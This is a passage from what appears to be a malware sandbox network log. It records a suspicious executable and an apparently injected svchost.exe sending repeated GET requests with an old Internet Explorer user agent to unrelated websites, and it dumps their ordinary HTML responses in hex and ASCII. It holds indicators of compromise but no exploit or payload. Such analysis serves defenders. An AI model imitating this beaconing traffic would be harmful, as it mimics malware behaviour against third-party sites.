2023-03-22 04:45:32 UTC	875	IN	Data Raw: 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 49 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 37 2f 31 31 2f 46 6c 61 6d 69 6e 67 6f 5f 4c 6f 67 6f 5f 53 74 69 63 6b 65 72 5f 42 69 72 64 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 20 3c 73 74 79 6c 65 20 69 64 3d 22 77 70 2d 63 75 73 74 6f 6d 2d 63 73 73 22 3e 20 2e 66 6c 2d 70 6f 73 74 2d 67 72 69 64 2d 70 6f 73 74 7b 0a 20 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0a 7d 0a 2e 72 65 6c 65 61 73 65 7b 0a 20 70 6f 73 69 Data Ascii: _1200px-300x300.png" /><meta name="msapplication-TileImage" content="https://flamingorecordings.com/wp-content/uploads/2017/11/Flamingo_Logo_Sticker_Bird_1200px-300x300.png" /> <style id="wp-custom-css"> .fl-post-grid-post{ border:none;}.release{ posi
2023-03-22 04:45:32 UTC	891	IN	Data Raw: 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 64 6d 69 6e 22 20 2f 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 70 72 6f 70 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 53 74 61 74 69 73 74 69 63 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 49 6e 74 65 72 61 63 74 69 6f 6e 43 6f 75 6e 74 65 72 22 3e 3c 6d Data Ascii: type="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta itemprop="name" content="admin" /></div><div itemprop="interactionStatistic" itemscope itemtype="https://schema.org/InteractionCounter"><m
2023-03-22 04:45:32 UTC	907	IN	Data Raw: 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 46 6c 61 6d 69 6e 67 6f 20 52 65 63 6f 72 64 69 6e 67 73 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 70 72 6f 70 3d 22 61 75 74 68 6f 72 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69 Data Ascii: temtype="https://schema.org/Organization"><meta itemprop="name" content="Flamingo Recordings"></div><div itemscope itemprop="author" itemtype="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta i
2023-03-22 04:45:32 UTC	923	IN	Data Raw: 6e 62 6b 4f 58 5f 68 6c 7a 6e 72 64 42 57 48 52 77 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 79 6f 75 74 75 62 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 3c 2f 61 3e 20 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 2d 69 63 6f 6e 22 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 69 6e 73 74 61 67 72 61 6d 22 20 Data Ascii: nbkOX_hlznrdBWHRw" target="_blank" rel="noopener" > <i class="fab fa-youtube" aria-hidden="true"></i> </a> </span> <span class="fl-icon"> <a href="https://www.instagram.com/flamingorecordings/" target="_blank" rel="noopener" > <i class="fab fa-instagram"

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.5	20163	185.237.66.112	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:32 UTC	925	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: techtrans.de
2023-03-22 04:45:32 UTC	926	IN	HTTP/1.1 403 Forbidden Date: Wed, 22 Mar 2023 04:45:32 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: 0 X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-03-22 04:45:32 UTC	926	IN	Data Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.5	20238	188.114.96.3	443	C:\Users\user\Desktop\6gjnnBAbpc.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:33 UTC	927	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: sigtoa.com
2023-03-22 04:45:33 UTC	971	IN	HTTP/1.1 403 Forbidden Date: Wed, 22 Mar 2023 04:45:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Frame-Options: SAMEORIGIN Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0GEb0hHB19jxZFY6dIMek5HP1wG4EZpsMFgbVQeV9FOMckjHz6F6uIh85%2BqiGGI22kPMt64G0yGzINSOYCFPZAdf8gHAH1uQjsZk64zGAfZIx9jcuoiqd%2BY5URuV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc929ce82918c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:33 UTC	973	IN	Data Raw: 31 65 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 Data Ascii: 1e93<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatib
2023-03-22 04:45:33 UTC	973	IN	Data Raw: 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69 Data Ascii: le" content="IE=Edge"> <meta name="robots" content="noindex,nofollow"> <meta name="viewport" content="width=device-width,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <di
2023-03-22 04:45:33 UTC	974	IN	Data Raw: 2e 63 6f 6d 20 6e 65 65 64 73 20 74 6f 20 72 65 76 69 65 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 6f 66 20 79 6f 75 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 70 72 6f 63 65 65 64 69 6e 67 2e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 57 41 49 5a 73 79 5f 61 6d 73 56 76 5a 4b 4b 35 5a 61 78 59 49 54 78 38 62 62 36 30 71 38 76 78 45 46 65 77 72 4c 69 66 31 58 6b 2d 31 36 37 39 34 36 30 33 33 33 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 Data Ascii: .com needs to review the security of your connection before proceeding. </div> <form id="challenge-form" action="/?__cf_chl_f_tk=WAIZsy_amsVvZKK5ZaxYITx8bb60q8vxEFewrLif1Xk-1679460333-0-gaNycGzNCPs" method="POST" enctype="application/x-www
2023-03-22 04:45:33 UTC	975	IN	Data Raw: 74 6d 7a 72 30 56 48 4b 47 39 5a 64 38 52 69 5a 42 34 35 50 62 61 69 62 39 74 42 7a 68 48 73 5f 39 4f 76 4d 53 75 4f 59 37 44 54 74 52 37 42 4b 6a 67 4e 68 56 4c 43 72 36 78 4f 38 37 38 4b 43 6d 64 35 6d 35 4a 69 39 43 68 48 57 67 79 39 36 48 49 59 42 33 78 2d 46 57 32 32 71 4b 4a 49 35 6f 4b 66 71 71 61 70 61 74 38 49 67 52 4d 70 61 31 4c 5f 61 65 57 57 4a 58 33 53 74 54 39 37 65 58 54 36 38 74 52 33 45 62 55 55 34 66 6c 33 6e 49 6f 31 4a 48 79 76 39 62 48 63 47 37 32 76 5a 56 73 44 70 79 78 69 47 4b 5f 54 4a 31 4a 67 58 67 43 30 6c 47 6c 4a 68 42 44 4d 74 31 49 6e 69 79 67 71 44 62 4f 6f 4b 31 38 6c 33 50 68 6b 57 63 5a 6a 32 36 4c 78 57 6f 48 41 5a 79 47 76 4c 70 49 77 5a 30 4b 64 4e 6c 75 64 76 71 6a 4b 35 49 30 39 49 4b 64 6b 4c 4d 6e 4d 52 44 5f 33 Data Ascii: tmzr0VHKG9Zd8RiZB45Pbaib9tBzhHs_9OvMSuOY7DTtR7BKjgNhVLCr6xO878KCmd5m5Ji9ChHWgy96HIYB3x-FW22qKJI5oKfqqapat8IgRMpa1L_aeWWJX3StT97eXT68tR3EbUU4fl3nIo1JHyv9bHcG72vZVsDpyxiGK_TJ1JgXgC0lGlJhBDMt1IniygqDbOoK18l3PhkWcZj26LxWoHAZyGvLpIwZ0KdNludvqjK5I09IKdkLMnMRD_3
2023-03-22 04:45:33 UTC	977	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 63 5a 6f 6e 65 3a 20 27 73 69 67 74 6f 61 2e 63 6f 6d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4e 6f 75 6e 63 65 3a 20 27 33 35 39 35 34 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 52 61 79 3a 20 27 37 61 62 62 63 39 32 39 63 65 38 32 39 31 38 63 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 31 39 63 32 61 37 35 36 63 31 62 63 65 63 35 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 57 41 49 5a 73 79 5f 61 6d 73 56 76 5a 4b 4b 35 5a 61 78 59 49 54 78 38 62 62 36 30 71 38 76 78 45 46 65 77 72 4c 69 66 31 58 6b 2d 31 36 37 39 34 Data Ascii: cZone: 'sigtoa.com', cType: 'managed', cNounce: '35954', cRay: '7abbc929ce82918c', cHash: '19c2a756c1bcec5', cUPMDTk: "\/?__cf_chl_tk=WAIZsy_amsVvZKK5ZaxYITx8bb60q8vxEFewrLif1Xk-16794
2023-03-22 04:45:33 UTC	978	IN	Data Raw: 20 20 20 20 20 6d 3a 20 27 45 2f 32 42 32 49 4f 75 71 71 6b 66 57 56 58 75 78 55 4e 55 36 47 4c 6b 48 67 45 74 4f 65 51 38 6b 30 51 69 42 32 4a 4e 2f 56 30 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 31 3a 20 27 2f 37 54 4d 5a 6c 6c 52 69 4b 5a 7a 62 70 68 42 6d 38 62 56 31 51 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 69 38 49 30 44 2f 59 2f 41 4a 36 78 32 72 4a 33 55 31 43 4f 46 67 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c Data Ascii: m: 'E/2B2IOuqqkfWVXuxUNU6GLkHgEtOeQ8k0QiB2JN/V0=', i1: '/7TMZllRiKZzbphBm8bV1Q==', i2: 'i8I0D/Y/AJ6x2rJ3U1COFg==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL
2023-03-22 04:45:33 UTC	980	IN	Data Raw: 61 6d 73 56 76 5a 4b 4b 35 5a 61 78 59 49 54 78 38 62 62 36 30 71 38 76 78 45 46 65 77 72 4c 69 66 31 58 6b 2d 31 36 37 39 34 36 30 33 33 33 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 Data Ascii: amsVvZKK5ZaxYITx8bb60q8vxEFewrLif1Xk-1679460333-0-gaNycGzNCPs" + window._cf_chl_opt.cOgUHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('hea
2023-03-22 04:45:33 UTC	980	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.5	20037	49.212.235.175	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:33 UTC	939	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: nts-web.net

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.5	20825	104.21.66.220	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:33 UTC	985	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: clinicasanluis.com.co Cookie: d55e479f054c94814cbc10d217aaa990=e54cc20c1d7fdf3749e95c6556111923
2023-03-22 04:45:33 UTC	990	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 04:45:33 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 17 Aug 2005 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Last-Modified: Wed, 22 Mar 2023 04:45:33 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4rlbhkzysBBTuUOMlMpEfoSaAhKsNoIZ9lU9bf1gHrdJYJM5pnKdnH%2Be%2BOZjMI2AyoyPA4Ho2h5hX066tSNf8C8RvzHfLFcDPQ1DC7u1s2EhyPShWvXshgKaw72FmeB7HD86xXMgXeU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc92c2bb72c62-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:33 UTC	991	IN	Data Raw: 37 63 62 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20 Data Ascii: 7cb3<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
2023-03-22 04:45:33 UTC	992	IN	Data Raw: 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2d 63 6f 6d 70 69 6c 65 64 2f 6e 75 63 6c 65 75 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f Data Ascii: popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/engines/nucleus/css-compiled/nucleus.css" rel="stylesheet" /><link href="/templates/
2023-03-22 04:45:33 UTC	993	IN	Data Raw: 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 6a 73 2f 72 6f 6b 62 6f 78 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6a 75 69 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 Data Ascii: tools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/rokbox/assets/js/rokbox.js"></script><script src="/media/jui/js/bootstrap.mi
2023-03-22 04:45:33 UTC	994	IN	Data Raw: 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 67 61 6e 74 72 79 20 73 Data Ascii: /nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link rel="shortcut icon" href="/images/favicon.png"></head><body class="gantry s
2023-03-22 04:45:33 UTC	996	IN	Data Raw: 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 30 34 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c Data Ascii: 63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item g-menu-item-type-separator g-menu-item-104 g-parent g-standard "><div cl
